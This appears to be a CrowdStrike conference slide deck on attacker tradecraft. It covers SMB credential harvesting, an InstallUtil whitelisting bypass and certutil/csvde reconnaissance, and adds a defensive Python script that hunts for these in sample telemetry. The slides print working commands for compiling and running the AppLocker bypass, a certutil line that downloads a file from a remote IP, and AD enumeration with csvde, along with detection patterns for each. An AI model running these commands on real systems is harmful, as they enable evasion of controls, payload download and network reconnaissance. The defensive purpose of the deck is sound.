LEARNING FROM HIGH-PROFILE BREACHES AND STOPPING THE NEXT ONE DAN LARSON –VP OF PRODUCT, CROWDSTRIKE
CROWD-SOURCED, CLOUD-BASED
CAPTURE: 150B events/day
ENRICH: Indicators of Compromise
HUNT: 109 adversaries tracked; Indicators of Attack; 25,000 breaches prevented/year
PROTECT: 3.5 million IOA decisions/sec
ARTIFICIAL INTELLIGENCE & MACHINE LEARNING

LATEST ADVERSARY TRADECRAFT

CATEGORY: CREDENTIAL THEFT
DELIVERY: STRATEGIC WEB COMPROMISE USING SMB
TECHNICAL BREAKDOWN
Variations of remote source:
- JavaScript + Dean Edwards Packer obfuscation
- Tiny image
- Hidden in jQuery-related JavaScript files

REAL WORLD EXAMPLES
Massive BERSERK BEAR credential harvesting campaign targeted numerous sectors:
- Chemical – Sept 2017
- Financial – Sept 2017
- Hospitality – Sept 2017
- Oil & Gas – April 2017
- Technology – April 2017
- Engineering – April 2017
- Education – April 2017

REAL WORLD EXAMPLES
Another variation used spear-phishing emails. Word documents contain code that attempts to retrieve a document template from a remote source over WebDAV.

REAL WORLD EXAMPLES
Post-harvesting activity:
- Offline hash cracking
- Pass-the-hash tools
- Public-facing services most vulnerable: webmail, VPN, remote conferencing software

COUNTERMEASURES
- Implement Two-Factor Authentication (2FA)
- Restrict or monitor SMB connectivity to remote servers
- Robust password policies (length / duration / reuse)
- Restrict or monitor remote user authentication
- Leverage threat intel to track known SMB C2s
CATEGORY: WHITELISTING BYPASS
DELIVERY: INSTALLUTIL

TECHNICAL BREAKDOWN
- InstallUtil: CLI tool for install/uninstall of apps
- Part of the .NET Framework
- MS-signed binary inside the Windows directory – handy for bypassing whitelists
- Discovered by @subTee, who also created C# code that can be used in combination to bypass AppLocker restriction of PowerShell

TECHNICAL BREAKDOWN
1. Use InstallUtil-PowerShell.cs and System.Management.Automation.dll to compile a special PowerShell executable with csc.exe:
   csc.exe /reference:System.Management.Automation.dll /out:powershell.exe InstallUtil-PowerShell.cs
2. Execute the PowerShell binary with InstallUtil:
   InstallUtil.exe /logfile= /LogToConsole=false /U powershell.exe

REAL WORLD EXAMPLES
Seen in Oct 2017, January 2018:
InstallUtil.exe" /run= /logfile= /LogToConsole=false /u "C:\Windows\Microsoft.NET\Framework\v4.0.30319\WPF\wpf-etw.dat
Consistent with QuasarRAT public reporting: https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf

InstallUtil.exe" /LogFile= /LogToConsole=false /u C:\Windows\System32\CatRoot\{127D0A1D-4EF2-11D1-8608-00C04FC295EE}\HECI.cat -inputFormat xml -outputFormat text
Chinese adversary

COUNTERMEASURES
- In many environments InstallUtil is rarely used
- Consider blocking its execution
- If needed, monitor its usage instead and compare arguments against historical usage
- Weak hunting indicator: FileName=installutil.exe AND CommandLine=*LogToConsole=false /u*
CATEGORY: DEPLOYMENT OF RECON TOOLS
DELIVERY: CERTUTIL + EXPAND + CSVDE

TECHNICAL BREAKDOWN
CERTUTIL
- A built-in Windows command-line program that is installed as part of AD Certificate Services
- Also has the ability to download a remote file (-urlcache flag) and decode base64 files (-decode flag)
- Great for downloading malware!

CSVDE
- Windows Server command-line program that is installed as part of the AD DS and AD LDS Tools feature
- NOT included with client OS
- Can be used to enumerate the AD environment

EXPAND
- A built-in Windows command-line program to decompress CAB files

TECHNICAL BREAKDOWN
Using CSVDE to enumerate Active Directory to disk:
csvde.exe -f out.csv
Here is a subset of the data returned. I couldn't fit it all, over 370 fields!

REAL WORLD EXAMPLES
Seen in Aug and Nov 2017:
certutil.exe -decode KB[REDACTED].log KB[REDACTED].log
expand KB[REDACTED].log csvde.exe
Chinese adversary

Seen in Feb 2018:
certutil.exe -urlcache -split -f http://xx.xx.xx.xx/news/n4.jpg C:\Users\[REDACTED]\AppData\Local\Temp\8\index.zip

COUNTERMEASURES
- Certutil is rarely used with the aforementioned command-line args
- Consider blocking its execution
- If needed, monitor its usage instead and compare arguments against historical usage
- Weak hunting indicator: FileName=certutil.exe AND CommandLine=*-urlcache -split -f*
- Weak hunting indicator: FileName=certutil.exe AND CommandLine=*-decode*
- CSVDE is not found on client versions of Windows; it can be blocked, or monitored as a hunting indicator on non-Server systems
- Weak hunting indicator: FileName=csvde.exe AND Type!=Server
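The weak hunting indicators from the three countermeasure slides (outbound SMB to remote servers, InstallUtil with /LogToConsole=false /u, certutil -urlcache/-decode, csvde on a non-Server host) translate directly into rules over process and network-connection telemetry. The script below is an added example written for this page, not CrowdStrike code: the event schema, host names, the "type" field standing in for the deck's Type!=Server, and every sample command line are constructed.

```python
"""Hunting rules for the deck's weak indicators, run over constructed telemetry.
Added example, not CrowdStrike code; the event schema is an assumption."""
import fnmatch
import ipaddress

# Constructed sample events (not real telemetry). "type" plays the role of the
# deck's Type field: "Workstation" or "Server".
SAMPLE_EVENTS = [
    {"event": "process", "host": "WS01", "type": "Workstation", "file": "InstallUtil.exe",
     "cmd": "InstallUtil.exe /logfile= /LogToConsole=false /u C:\\Temp\\x.dat"},
    {"event": "process", "host": "WS02", "type": "Workstation", "file": "certutil.exe",
     "cmd": "certutil.exe -urlcache -split -f http://203.0.113.7/news/n4.jpg C:\\Temp\\index.zip"},
    {"event": "process", "host": "WS02", "type": "Workstation", "file": "certutil.exe",
     "cmd": "certutil.exe -decode KB1.log KB2.log"},
    {"event": "process", "host": "WS03", "type": "Workstation", "file": "csvde.exe",
     "cmd": "csvde.exe -f out.csv"},
    {"event": "process", "host": "DC01", "type": "Server", "file": "csvde.exe",
     "cmd": "csvde.exe -f out.csv"},                       # expected on a server: no hit
    {"event": "process", "host": "WS04", "type": "Workstation", "file": "certutil.exe",
     "cmd": "certutil.exe -verifystore My"},               # benign certutil usage: no hit
    {"event": "netconn", "host": "WS01", "type": "Workstation",
     "dst": "203.0.113.9", "port": 445},                   # SMB to a non-RFC1918 address
    {"event": "netconn", "host": "WS01", "type": "Workstation",
     "dst": "10.0.0.5", "port": 445},                      # internal file server: no hit
]

# Process rules: (rule name, file name, command-line glob), as on the slides.
PROCESS_RULES = [
    ("installutil_quiet_uninstall", "installutil.exe", "*LogToConsole=false /u*"),
    ("certutil_download", "certutil.exe", "*-urlcache -split -f*"),
    ("certutil_decode", "certutil.exe", "*-decode*"),
]

# RFC1918 ranges treated as "internal"; anything else on TCP 445 is remote SMB.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


def match_process(ev):
    """Return the names of every process rule the event trips (case-insensitive)."""
    name, cmd = ev["file"].lower(), ev["cmd"].lower()
    hits = [rule for rule, file_name, pattern in PROCESS_RULES
            if name == file_name and fnmatch.fnmatchcase(cmd, pattern.lower())]
    # csvde ships only with Windows Server, so on a client OS it is a hunting lead.
    if name == "csvde.exe" and ev["type"] != "Server":
        hits.append("csvde_on_client")
    return hits


def match_netconn(ev):
    """Flag outbound SMB (TCP 445) to an address outside the internal ranges."""
    dst = ipaddress.ip_address(ev["dst"])
    if ev["port"] == 445 and not any(dst in net for net in INTERNAL_NETS):
        return ["smb_to_external"]
    return []


def hunt(events):
    """Run all rules over a list of events and return (host, rule) findings."""
    findings = []
    for ev in events:
        hits = match_process(ev) if ev["event"] == "process" else match_netconn(ev)
        findings.extend((ev["host"], h) for h in hits)
    return findings


if __name__ == "__main__":
    for host, rule in hunt(SAMPLE_EVENTS):
        print(f"{host}: {rule}")
```

The rules are deliberately as loose as the slides describe them ("weak" indicators): the next step in a real hunt is to compare each hit against the host's historical command lines, which is why the slides recommend monitoring over blocking where the binaries are legitimately used.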
SPEED IS EVERYTHING: THE 1-10-60 RULE
1 HOUR 58 MINUTES BREAKOUT TIME
Average time for an intruder to begin moving laterally to other systems in the network

SURVIVAL OF THE FASTEST: THE 1-10-60 RULE
- Time to detect: 1 min
- Time to investigate: 10 min
- Time to remediate & contain: 60 min

SURVIVAL OF THE FASTEST: THE 1-10-60 RULE
Time to detect: 1 min. Keys to success:
- Artificial intelligence & machine learning
- Indicators of attack
- Cloud-native architecture

SURVIVAL OF THE FASTEST: THE 1-10-60 RULE
Time to investigate: 10 min. Keys to success:
- Endpoint detection & response
- Threat intelligence
- Hunting team

SURVIVAL OF THE FASTEST: THE 1-10-60 RULE
Time to remediate & contain: 60 min. Keys to success:
- Cloud-based remote device management
- Proactive planning & prep
- Good business processes & communication

THE POWER OF ONE
TRY IT FOR YOURSELF: crowdstrike.com/freetrial